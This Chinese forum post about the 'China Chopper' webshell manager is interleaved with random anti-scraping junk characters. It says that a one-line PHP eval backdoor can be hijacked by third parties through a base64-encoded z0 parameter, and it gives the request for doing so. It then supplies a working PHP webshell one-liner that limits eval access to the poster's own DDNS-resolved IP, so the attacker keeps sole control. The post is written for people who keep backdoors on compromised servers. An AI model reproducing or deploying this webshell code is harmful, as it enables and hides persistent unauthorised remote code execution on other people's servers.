今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞
; |# |, s; {) J4 {, e
1 E% T/ j. @/ I8 A就算你设置了密码,使用了eval($_REQUEST['moyo']);8 l5 P4 Z+ v$ C2 f$ K I
2 C1 s2 K: g' @. |但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门6 z; L/ E" V( {# n) Q
1 T2 {' O( V% R8 }2 [
因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));3 t8 @9 v0 Y$ P. e& e
3 g" C" g4 x# K: c: L) o
直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了9 C) W: R; N* f( G9 }
7 n/ S& x8 o5 H$ y9 ?" ~- O不知道是设计缺陷还是故意留的后门
* {- q% N( ?4 u$ `1 e
+ E& F( s, i2 j$ f2 T如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用; }2 g2 i5 ?" e( ?! F1 b) B3 p
( x6 D( p$ G% C) I7 Q
本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org
( B) d) |2 a6 p9 l+ a Q1 o" J/ F% p5 Q
然后一句话后门这样写
9 b5 j1 @7 v4 {4 {
0 T% a& L- s) u) O2 U! L<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>% j1 e3 O. ~! w, G9 z1 [: y
这样就可以让一句话后门只允许自己的电脑连接了3 O, a# x+ X& W7 g t/ d- ^
" p! U# B) Z/ P! ]7 K |